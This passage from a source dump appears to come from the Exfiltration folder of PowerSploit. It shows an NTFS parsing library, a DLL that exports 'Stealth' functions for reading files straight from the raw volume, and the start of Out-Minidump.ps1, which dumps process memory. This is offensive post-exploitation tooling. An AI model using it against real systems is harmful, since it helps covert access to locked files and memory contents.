211 | 			((CSList<ENTRY_TYPE>*)this)->ListCurrent = ListCurrent->Next;
212 | 
213 | 		if (ListCurrent)
214 | 			return ListCurrent->Entry;
215 | 		else
216 | 			return NULL;
217 | 	}
218 | 
219 | 	// Throw all entries
220 | 	// Caution! All entries are just thrown without free
221 | 	__inline void ThrowAll()
222 | 	{
223 | 		ListHead = ListTail = NULL;
224 | 		ListCurrent = NULL;
225 | 		EntryCount = 0;
226 | 	}
227 | };	//CSList
228 | 
229 | 
230 | //////////////////////////////////////
231 | // Stack implementation
232 | //////////////////////////////////////
233 | template <class ENTRY_TYPE>
234 | class CStack
235 | {
236 | public:
237 | 	CStack()
238 | 	{
239 | 		ListHead = ListTail = NULL;
240 | 		EntryCount = 0;
241 | 	}
242 | 
243 | 	virtual ~CStack()
244 | 	{
245 | 		RemoveAll();
246 | 	}
247 | 
248 | private:
249 | 	int EntryCount;
250 | 	NTSLIST_ENTRY<ENTRY_TYPE> *ListHead;
251 | 	NTSLIST_ENTRY<ENTRY_TYPE> *ListTail;
252 | 
253 | public:
254 | 	// Get entry count
255 | 	__inline int GetCount() const
256 | 	{
257 | 		return EntryCount;
258 | 	}
259 | 
260 | 	// Insert to head
261 | 	BOOL Push(ENTRY_TYPE *entry)
262 | 	{
263 | 		NTSLIST_ENTRY<ENTRY_TYPE> *le = new NTSLIST_ENTRY<ENTRY_TYPE>;
264 | 		if (!le)
265 | 			return FALSE;
266 | 
267 | 		le->Entry = entry;
268 | 		le->Next = ListHead;
269 | 
270 | 		ListHead = le;
271 | 
272 | 		if (ListTail == NULL)
273 | 			ListTail = le;		// Empty list
274 | 
275 | 		EntryCount ++;
276 | 		return TRUE;
277 | 	}
278 | 
279 | 	// Remove from head
280 | 	ENTRY_TYPE* Pop()
281 | 	{
282 | 		if (ListHead == NULL)
283 | 			return NULL;
284 | 
285 | 		NTSLIST_ENTRY<ENTRY_TYPE> *le = ListHead;
286 | 		ENTRY_TYPE *e = le->Entry;
287 | 
288 | 		if (ListTail == ListHead)
289 | 			ListTail = ListHead->Next;
290 | 		ListHead = ListHead->Next;
291 | 
292 | 		delete le;
293 | 		EntryCount --;
294 | 
295 | 		return e;
296 | 	}
297 | 
298 | 	// Remove all entries
299 | 	void RemoveAll()
300 | 	{
301 | 		NTSLIST_ENTRY<ENTRY_TYPE> *le;
302 | 
303 | 		while (ListHead)
304 | 		{
305 | 			le = ListHead->Next;
306 | 			delete ListHead->Entry;
307 | 			delete ListHead;
308 | 
309 | 			ListHead = le;
310 | 		}
311 | 
312 | 		ListHead = ListTail = NULL;
313 | 		EntryCount = 0;
314 | 	}
315 | };	//CStack
316 | 
317 | #endif
318 | 


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     CONSOLE APPLICATION : NTFSParser Project Overview
 3 | ========================================================================
 4 | 
 5 | AppWizard has created this NTFSParser application for you.
 6 | 
 7 | This file contains a summary of what you will find in each of the files that
 8 | make up your NTFSParser application.
 9 | 
10 | 
11 | NTFSParser.vcxproj
12 |     This is the main project file for VC++ projects generated using an Application Wizard.
13 |     It contains information about the version of Visual C++ that generated the file, and
14 |     information about the platforms, configurations, and project features selected with the
15 |     Application Wizard.
16 | 
17 | NTFSParser.vcxproj.filters
18 |     This is the filters file for VC++ projects generated using an Application Wizard. 
19 |     It contains information about the association between the files in your project 
20 |     and the filters. This association is used in the IDE to show grouping of files with
21 |     similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 |     "Source Files" filter).
23 | 
24 | NTFSParser.cpp
25 |     This is the main application source file.
26 | 
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 | 
30 | StdAfx.h, StdAfx.cpp
31 |     These files are used to build a precompiled header (PCH) file
32 |     named NTFSParser.pch and a precompiled types file named StdAfx.obj.
33 | 
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 | 
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 | 
40 | /////////////////////////////////////////////////////////////////////////////
41 | 


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #include <stdio.h>
11 | #include <tchar.h>
12 | #include <iostream>
13 | #include <string>
14 | #include <fstream>
15 | 
16 | 
17 | // TODO: reference additional headers your program requires here
18 | 


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/NTFS.h:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * NTFS include files
 3 |  * 
 4 |  * Copyright(C) 2010 cyb70289 <cyb70289@gmail.com>
 5 |  *
 6 |  * This program/include file is free software; you can redistribute it and/or
 7 |  * modify it under the terms of the GNU General Public License as published
 8 |  * by the Free Software Foundation; either version 2 of the License, or
 9 |  * (at your option) any later version.
10 |  *
11 |  * This program/include file is distributed in the hope that it will be
12 |  * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 |  * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 |  * GNU General Public License for more details.
15 |  */
16 | 
17 | #ifndef __NTFS_H_CYB70289
18 | #define	__NTFS_H_CYB70289
19 | 
20 | #pragma pack(8)
21 | 
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 | 
26 | #pragma pack()
27 | 
28 | #endif
29 | 


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.cpp:
--------------------------------------------------------------------------------
  1 | /*
  2 |  * 
  3 |  * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
  4 |  *
  5 |  * This program/include file is free software; you can redistribute it and/or
  6 |  * modify it under the terms of the GNU General Public License as published
  7 |  * by the Free Software Foundation; either version 2 of the License, or
  8 |  * (at your option) any later version.
  9 |  *
 10 |  * This program/include file is distributed in the hope that it will be
 11 |  * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
 12 |  * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 13 |  * GNU General Public License for more details.
 14 |  */
 15 | //
 16 | // This code uses libraries released under GPLv2(or later) written by cyb70289 <cyb70289@gmail.com>
 17 | 
 18 | #include "stdafx.h"
 19 | #include "NTFS.h"
 20 | #include "NTFS_DataType.h"
 21 | 
 22 | using namespace std;
 23 | 
 24 | struct FileInfo_t
 25 | {
 26 | 	CNTFSVolume* volume;
 27 | 	CFileRecord* fileRecord;
 28 | 	CIndexEntry* indexEntry;
 29 | 	CAttrBase* data;
 30 | };
 31 | 
 32 | extern "C" HANDLE __declspec(dllexport) StealthOpenFile(char* filePathCStr)
 33 | {
 34 | 	FileInfo_t* fileInfo = new FileInfo_t;
 35 | 
 36 | 	string filePath = string(filePathCStr);
 37 | 	_TCHAR volumeName = filePath.at(0);
 38 | 
 39 | 	fileInfo->volume = new CNTFSVolume(volumeName);
 40 | 	if (!fileInfo->volume->IsVolumeOK())
 41 | 	{
 42 | 		return NULL;
 43 | 	}
 44 | 
 45 | 	//Parse root directory
 46 | 	fileInfo->fileRecord = new CFileRecord(fileInfo->volume);
 47 | 	fileInfo->fileRecord->SetAttrMask(MASK_INDEX_ROOT | MASK_INDEX_ALLOCATION);
 48 | 
 49 | 	if (!fileInfo->fileRecord->ParseFileRecord(MFT_IDX_ROOT))
 50 | 	{
 51 | 		return NULL;
 52 | 	}
 53 | 	if (!fileInfo->fileRecord->ParseAttrs())
 54 | 	{
 55 | 		return NULL;
 56 | 	}
 57 | 
 58 | 	//Find subdirectory
 59 | 	fileInfo->indexEntry = new CIndexEntry;
 60 | 	int dirs = filePath.find(_T('\\'), 0);
 61 | 	int dire = filePath.find(_T('\\'), dirs+1);
 62 | 
 63 | 	while (dire != string::npos)
 64 | 	{
 65 | 		string pathname = filePath.substr(dirs+1, dire-dirs-1);
 66 | 		const _TCHAR* pathnameCStr = (const _TCHAR*)pathname.c_str();
 67 | 		if (fileInfo->fileRecord->FindSubEntry(pathnameCStr, *(fileInfo->indexEntry)))
 68 | 		{
 69 | 			if (!fileInfo->fileRecord->ParseFileRecord(fileInfo->indexEntry->GetFileReference()))
 70 | 			{
 71 | 				return NULL;
 72 | 			}
 73 | 
 74 | 			if (!fileInfo->fileRecord->ParseAttrs())
 75 | 			{
 76 | 				if (fileInfo->fileRecord->IsCompressed())
 77 | 				{
 78 | 					return NULL;
 79 | 				}
 80 | 				else if (fileInfo->fileRecord->IsEncrypted())
 81 | 				{
 82 | 					return NULL;
 83 | 				}
 84 | 				else
 85 | 				{
 86 | 					return NULL;
 87 | 				}
 88 | 			}
 89 | 		}
 90 | 		else
 91 | 		{
 92 | 			return NULL;
 93 | 		}
 94 | 
 95 | 
 96 | 		dirs = dire;
 97 | 		dire = filePath.find(_T('\\'), dirs+1);
 98 | 	}
 99 | 
100 | 	string fileName = filePath.substr(dirs+1, filePath.size()-1);
101 | 	const _TCHAR* fileNameCStr = (const _TCHAR*)fileName.c_str();
102 | 	if (fileInfo->fileRecord->FindSubEntry(fileNameCStr, *(fileInfo->indexEntry)))
103 | 	{
104 | 		if (!fileInfo->fileRecord->ParseFileRecord(fileInfo->indexEntry->GetFileReference()))
105 | 		{
106 | 			return NULL;
107 | 		}
108 | 
109 | 		fileInfo->fileRecord->SetAttrMask(MASK_DATA);
110 | 		if (!fileInfo->fileRecord->ParseAttrs())
111 | 		{
112 | 			return NULL;
113 | 		}
114 | 
115 | 		 fileInfo->data = (CAttrBase*)fileInfo->fileRecord->FindStream();
116 | 
117 | 		 return fileInfo;
118 | 	}
119 | 
120 | 	return NULL;
121 | }
122 | 
123 | 
124 | extern "C" DWORD __declspec(dllexport) StealthReadFile(FileInfo_t* fileInfo, BYTE* buffer, DWORD bufferSize, ULONGLONG offset, DWORD* bytesRead, ULONGLONG* dataRemaining)
125 | {
126 | 
127 | 	if (fileInfo->data)
128 | 	{
129 | 		ULONGLONG dataLength = (ULONGLONG)fileInfo->data->GetDataSize();
130 | 		ULONGLONG fullDataLength = dataLength;
131 | 
132 | 		dataLength = dataLength - offset;
133 | 		if (dataLength > bufferSize)
134 | 		{
135 | 			dataLength = bufferSize;
136 | 		}
137 | 		if (dataLength > MAXUINT32)
138 | 		{
139 | 			return 1;
140 | 		}
141 | 
142 | 		DWORD len;
143 | 		if (fileInfo->data->ReadData(offset, buffer, dataLength, &len) && len == dataLength)
144 | 		{
145 | 			*bytesRead = len;
146 | 			*dataRemaining = fullDataLength - len - offset;
147 | 			return 0; //Success
148 | 		}
149 | 		return 3;
150 | 	}
151 | 	return 2;
152 | }
153 | 
154 | 
155 | extern "C" void __declspec(dllexport) StealthCloseFile(FileInfo_t* fileInfo)
156 | {
157 | 	delete (fileInfo->data);
158 | 	delete (fileInfo->indexEntry);
159 | 	delete (fileInfo->volume);
160 | 	delete fileInfo;
161 | }
162 | 


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <Text Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClCompile Include="stdafx.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |     <ClCompile Include="NTFSParserDLL.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |     <ClCompile Include="dllmain.cpp">
36 |       <Filter>Source Files</Filter>
37 |     </ClCompile>
38 |   </ItemGroup>
39 | </Project>


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/NTFS_Common.h:
--------------------------------------------------------------------------------
  1 | /*
  2 |  * NTFS Class common definitions
  3 |  * 
  4 |  * Copyright(C) 2010 cyb70289 <cyb70289@gmail.com>
  5 |  *
  6 |  * This program/include file is free software; you can redistribute it and/or
  7 |  * modify it under the terms of the GNU General Public License as published
  8 |  * by the Free Software Foundation; either version 2 of the License, or
  9 |  * (at your option) any later version.
 10 |  *
 11 |  * This program/include file is distributed in the hope that it will be
 12 |  * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
 13 |  * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 14 |  * GNU General Public License for more details.
 15 |  */
 16 | 
 17 | #ifndef	__NTFS_COMMON_H_CYB70289
 18 | #define	__NTFS_COMMON_H_CYB70289
 19 | 
 20 | #include <windows.h>
 21 | #include <stdio.h>
 22 | #include <tchar.h>
 23 | #include <crtdbg.h>
 24 | 
 25 | #include "NTFS_DataType.h"
 26 | 
 27 | #define	ATTR_NUMS		16				// Attribute Types count
 28 | #define	ATTR_INDEX(at)	(((at)>>4)-1)	// Attribute Type to Index, eg. 0x10->0, 0x30->2
 29 | #define	ATTR_MASK(at)	(((DWORD)1)<<ATTR_INDEX(at))	// Attribute Bit Mask
 30 | 
 31 | // Bit masks of Attributes
 32 | #define	MASK_STANDARD_INFORMATION	ATTR_MASK(ATTR_TYPE_STANDARD_INFORMATION)
 33 | #define	MASK_ATTRIBUTE_LIST			ATTR_MASK(ATTR_TYPE_ATTRIBUTE_LIST)
 34 | #define	MASK_FILE_NAME				ATTR_MASK(ATTR_TYPE_FILE_NAME)
 35 | #define	MASK_OBJECT_ID				ATTR_MASK(ATTR_TYPE_OBJECT_ID)
 36 | #define	MASK_SECURITY_DESCRIPTOR	ATTR_MASK(ATTR_TYPE_SECURITY_DESCRIPTOR)
 37 | #define	MASK_VOLUME_NAME			ATTR_MASK(ATTR_TYPE_VOLUME_NAME)
 38 | #define	MASK_VOLUME_INFORMATION		ATTR_MASK(ATTR_TYPE_VOLUME_INFORMATION)
 39 | #define	MASK_DATA					ATTR_MASK(ATTR_TYPE_DATA)
 40 | #define	MASK_INDEX_ROOT				ATTR_MASK(ATTR_TYPE_INDEX_ROOT)
 41 | #define	MASK_INDEX_ALLOCATION		ATTR_MASK(ATTR_TYPE_INDEX_ALLOCATION)
 42 | #define	MASK_BITMAP					ATTR_MASK(ATTR_TYPE_BITMAP)
 43 | #define	MASK_REPARSE_POINT			ATTR_MASK(ATTR_TYPE_REPARSE_POINT)
 44 | #define	MASK_EA_INFORMATION			ATTR_MASK(ATTR_TYPE_EA_INFORMATION)
 45 | #define	MASK_EA						ATTR_MASK(ATTR_TYPE_EA)
 46 | #define	MASK_LOGGED_UTILITY_STREAM	ATTR_MASK(ATTR_TYPE_LOGGED_UTILITY_STREAM)
 47 | 
 48 | #define	MASK_ALL					((DWORD)-1)
 49 | 
 50 | #define	NTFS_TRACE(t1)					_RPT0(_CRT_WARN, t1)
 51 | #define	NTFS_TRACE1(t1, t2)				_RPT1(_CRT_WARN, t1, t2)
 52 | #define	NTFS_TRACE2(t1, t2, t3)			_RPT2(_CRT_WARN, t1, t2, t3)
 53 | #define	NTFS_TRACE3(t1, t2, t3, t4)		_RPT3(_CRT_WARN, t1, t2, t3, t4)
 54 | #define	NTFS_TRACE4(t1, t2, t3, t4, t5)	_RPT4(_CRT_WARN, t1, t2, t3, t4, t5)
 55 | 
 56 | // User defined Callback routines to process raw attribute data
 57 | // Set bDiscard to TRUE if this Attribute is to be discarded
 58 | // Set bDiscard to FALSE to let CFileRecord process it
 59 | typedef void (*ATTR_RAW_CALLBACK)(const ATTR_HEADER_COMMON *attrHead, BOOL *bDiscard);
 60 | 
 61 | // User defined Callback routine to handle CFileRecord parsed attributes
 62 | // Will be called by CFileRecord::TraverseAttrs() for each attribute
 63 | // attrClass is the according attribute's wrapping class, CAttr_xxx
 64 | // Set bStop to TRUE if don't want to continue
 65 | // Set bStop to FALSE to continue processing
 66 | class CAttrBase;
 67 | typedef void (*ATTRS_CALLBACK)(const CAttrBase *attr, void *context, BOOL *bStop);
 68 | 
 69 | // User defined Callback routine to handle Directory traversing
 70 | // Will be called by CFileRecord::TraverseSubEntries for each sub entry
 71 | class CIndexEntry;
 72 | typedef void (*SUBENTRY_CALLBACK)(const CIndexEntry *ie);
 73 | 
 74 | 
 75 | // List Entry
 76 | template <class ENTRY_TYPE>
 77 | struct NTSLIST_ENTRY
 78 | {
 79 | 	NTSLIST_ENTRY	*Next;
 80 | 	ENTRY_TYPE		*Entry;
 81 | };
 82 | 
 83 | // List Entry Smart Pointer
 84 | template <class ENTRY_TYPE>
 85 | class CEntrySmartPtr
 86 | {
 87 | public:
 88 | 	CEntrySmartPtr(ENTRY_TYPE *ptr = NULL)
 89 | 	{
 90 | 		EntryPtr = ptr;
 91 | 	}
 92 | 
 93 | 	virtual ~CEntrySmartPtr()
 94 | 	{
 95 | 		if (EntryPtr)
 96 | 			delete EntryPtr;
 97 | 	}
 98 | 
 99 | private:
100 | 	const ENTRY_TYPE *EntryPtr;
101 | 
102 | public:
103 | 	__inline CEntrySmartPtr<ENTRY_TYPE> operator = (const ENTRY_TYPE* ptr)
104 | 	{
105 | 		// Delete previous pointer if allocated
106 | 		if (EntryPtr)
107 | 			delete EntryPtr;
108 | 
109 | 		EntryPtr = ptr;
110 | 
111 | 		return *this;
112 | 	}
113 | 
114 | 	__inline const ENTRY_TYPE* operator->() const
115 | 	{
116 | 		_ASSERT(EntryPtr);
117 | 		return EntryPtr;
118 | 	}
119 | 
120 | 	__inline BOOL IsValid() const
121 | 	{
122 | 		return EntryPtr != NULL;
123 | 	}
124 | };
125 | 
126 | //////////////////////////////////////
127 | // Single list implementation
128 | //////////////////////////////////////
129 | template <class ENTRY_TYPE>
130 | class CSList
131 | {
132 | public:
133 | 	CSList()
134 | 	{
135 | 		ListHead = ListTail = NULL;
136 | 		ListCurrent = NULL;
137 | 		EntryCount = 0;
138 | 	}
139 | 
140 | 	virtual ~CSList()
141 | 	{
142 | 		RemoveAll();
143 | 	}
144 | 
145 | private:
146 | 	int EntryCount;
147 | 	NTSLIST_ENTRY<ENTRY_TYPE> *ListHead;
148 | 	NTSLIST_ENTRY<ENTRY_TYPE> *ListTail;
149 | 	NTSLIST_ENTRY<ENTRY_TYPE> *ListCurrent;
150 | 
151 | public:
152 | 	// Get entry count
153 | 	__inline int GetCount() const
154 | 	{
155 | 		return EntryCount;
156 | 	}
157 | 
158 | 	// Insert to tail
159 | 	BOOL InsertEntry(ENTRY_TYPE *entry)
160 | 	{
161 | 		NTSLIST_ENTRY<ENTRY_TYPE> *le = new NTSLIST_ENTRY<ENTRY_TYPE>;
162 | 		if (!le)
163 | 			return FALSE;
164 | 
165 | 		le->Entry = entry;
166 | 		le->Next = NULL;
167 | 
168 | 		if (ListTail == NULL)
169 | 			ListHead = le;		// Empty list
170 | 		else
171 | 			ListTail->Next = le;
172 | 
173 | 		ListTail = le;
174 | 
175 | 		EntryCount++;
176 | 		return TRUE;
177 | 	}
178 | 
179 | 	// Remove all entries
180 | 	void RemoveAll()
181 | 	{
182 | 		while (ListHead)
183 | 		{
184 | 			ListCurrent = ListHead->Next;
185 | 			delete ListHead->Entry;
186 | 			delete ListHead;
187 | 
188 | 			ListHead = ListCurrent;
189 | 		}
190 | 
191 | 		ListHead = ListTail = NULL;
192 | 		ListCurrent = NULL;
193 | 		EntryCount = 0;
194 | 	}
195 | 
196 | 	// Find first entry
197 | 	__inline ENTRY_TYPE *FindFirstEntry() const
198 | 	{
199 | 		((CSList<ENTRY_TYPE>*)this)->ListCurrent = ListHead;
200 | 
201 | 		if (ListCurrent)
202 | 			return ListCurrent->Entry;
203 | 		else
204 | 			return NULL;
205 | 	}
206 | 
207 | 	// Find next entry
208 | 	__inline ENTRY_TYPE *FindNextEntry() const
209 | 	{
210 | 		if (ListCurrent)
211 | 			((CSList<ENTRY_TYPE>*)this)->ListCurrent = ListCurrent->Next;
212 | 
213 | 		if (ListCurrent)
214 | 			return ListCurrent->Entry;
215 | 		else
216 | 			return NULL;
217 | 	}
218 | 
219 | 	// Throw all entries
220 | 	// Caution! All entries are just thrown without free
221 | 	__inline void ThrowAll()
222 | 	{
223 | 		ListHead = ListTail = NULL;
224 | 		ListCurrent = NULL;
225 | 		EntryCount = 0;
226 | 	}
227 | };	//CSList
228 | 
229 | 
230 | //////////////////////////////////////
231 | // Stack implementation
232 | //////////////////////////////////////
233 | template <class ENTRY_TYPE>
234 | class CStack
235 | {
236 | public:
237 | 	CStack()
238 | 	{
239 | 		ListHead = ListTail = NULL;
240 | 		EntryCount = 0;
241 | 	}
242 | 
243 | 	virtual ~CStack()
244 | 	{
245 | 		RemoveAll();
246 | 	}
247 | 
248 | private:
249 | 	int EntryCount;
250 | 	NTSLIST_ENTRY<ENTRY_TYPE> *ListHead;
251 | 	NTSLIST_ENTRY<ENTRY_TYPE> *ListTail;
252 | 
253 | public:
254 | 	// Get entry count
255 | 	__inline int GetCount() const
256 | 	{
257 | 		return EntryCount;
258 | 	}
259 | 
260 | 	// Insert to head
261 | 	BOOL Push(ENTRY_TYPE *entry)
262 | 	{
263 | 		NTSLIST_ENTRY<ENTRY_TYPE> *le = new NTSLIST_ENTRY<ENTRY_TYPE>;
264 | 		if (!le)
265 | 			return FALSE;
266 | 
267 | 		le->Entry = entry;
268 | 		le->Next = ListHead;
269 | 
270 | 		ListHead = le;
271 | 
272 | 		if (ListTail == NULL)
273 | 			ListTail = le;		// Empty list
274 | 
275 | 		EntryCount ++;
276 | 		return TRUE;
277 | 	}
278 | 
279 | 	// Remove from head
280 | 	ENTRY_TYPE* Pop()
281 | 	{
282 | 		if (ListHead == NULL)
283 | 			return NULL;
284 | 
285 | 		NTSLIST_ENTRY<ENTRY_TYPE> *le = ListHead;
286 | 		ENTRY_TYPE *e = le->Entry;
287 | 
288 | 		if (ListTail == ListHead)
289 | 			ListTail = ListHead->Next;
290 | 		ListHead = ListHead->Next;
291 | 
292 | 		delete le;
293 | 		EntryCount --;
294 | 
295 | 		return e;
296 | 	}
297 | 
298 | 	// Remove all entries
299 | 	void RemoveAll()
300 | 	{
301 | 		NTSLIST_ENTRY<ENTRY_TYPE> *le;
302 | 
303 | 		while (ListHead)
304 | 		{
305 | 			le = ListHead->Next;
306 | 			delete ListHead->Entry;
307 | 			delete ListHead;
308 | 
309 | 			ListHead = le;
310 | 		}
311 | 
312 | 		ListHead = ListTail = NULL;
313 | 		EntryCount = 0;
314 | 	}
315 | };	//CStack
316 | 
317 | #endif
318 | 


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     DYNAMIC LINK LIBRARY : NTFSParserDLL Project Overview
 3 | ========================================================================
 4 | 
 5 | AppWizard has created this NTFSParserDLL DLL for you.
 6 | 
 7 | This file contains a summary of what you will find in each of the files that
 8 | make up your NTFSParserDLL application.
 9 | 
10 | 
11 | NTFSParserDLL.vcxproj
12 |     This is the main project file for VC++ projects generated using an Application Wizard.
13 |     It contains information about the version of Visual C++ that generated the file, and
14 |     information about the platforms, configurations, and project features selected with the
15 |     Application Wizard.
16 | 
17 | NTFSParserDLL.vcxproj.filters
18 |     This is the filters file for VC++ projects generated using an Application Wizard. 
19 |     It contains information about the association between the files in your project 
20 |     and the filters. This association is used in the IDE to show grouping of files with
21 |     similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 |     "Source Files" filter).
23 | 
24 | NTFSParserDLL.cpp
25 |     This is the main DLL source file.
26 | 
27 | 	When created, this DLL does not export any symbols. As a result, it
28 | 	will not produce a .lib file when it is built. If you wish this project
29 | 	to be a project dependency of some other project, you will either need to
30 | 	add code to export some symbols from the DLL so that an export library
31 | 	will be produced, or you can set the Ignore Input Library property to Yes
32 | 	on the General propert page of the Linker folder in the project's Property
33 | 	Pages dialog box.
34 | 
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 | 
38 | StdAfx.h, StdAfx.cpp
39 |     These files are used to build a precompiled header (PCH) file
40 |     named NTFSParserDLL.pch and a precompiled types file named StdAfx.obj.
41 | 
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 | 
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 | 
48 | /////////////////////////////////////////////////////////////////////////////
49 | 


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/dllmain.cpp:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * 
 3 |  * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
 4 |  *
 5 |  * This program/include file is free software; you can redistribute it and/or
 6 |  * modify it under the terms of the GNU General Public License as published
 7 |  * by the Free Software Foundation; either version 2 of the License, or
 8 |  * (at your option) any later version.
 9 |  *
10 |  * This program/include file is distributed in the hope that it will be
11 |  * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 |  * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 |  * GNU General Public License for more details.
14 |  */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289 <cyb70289@gmail.com>
17 | 
18 | // dllmain.cpp : Defines the entry point for the DLL application.
19 | #include "stdafx.h"
20 | 
21 | BOOL APIENTRY DllMain( HMODULE hModule,
22 |                        DWORD  ul_reason_for_call,
23 |                        LPVOID lpReserved
24 | 					 )
25 | {
26 | 	switch (ul_reason_for_call)
27 | 	{
28 | 	case DLL_PROCESS_ATTACH:
29 | 	case DLL_THREAD_ATTACH:
30 | 	case DLL_THREAD_DETACH:
31 | 	case DLL_PROCESS_DETACH:
32 | 		break;
33 | 	}
34 | 	return TRUE;
35 | }
36 | 
37 | 


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParserDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include <windows.h>
13 | #include <string>
14 | #include <iostream>
15 | 
16 | 
17 | 
18 | // TODO: reference additional headers your program requires here
19 | 


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/Exfiltration/Out-Minidump.ps1:
--------------------------------------------------------------------------------
  1 | function Out-Minidump
  2 | {
  3 | <#
  4 | .SYNOPSIS
  5 | 
  6 |     Generates a full-memory minidump of a process.
  7 | 
  8 |     PowerSploit Function: Out-Minidump
  9 |     Author: Matthew Graeber (@mattifestation)
 10 |     License: BSD 3-Clause
 11 |     Required Dependencies: None
 12 |     Optional Dependencies: None
 13 | 
 14 | .DESCRIPTION
 15 | 
 16 |     Out-Minidump writes a process dump file with all process memory to disk.
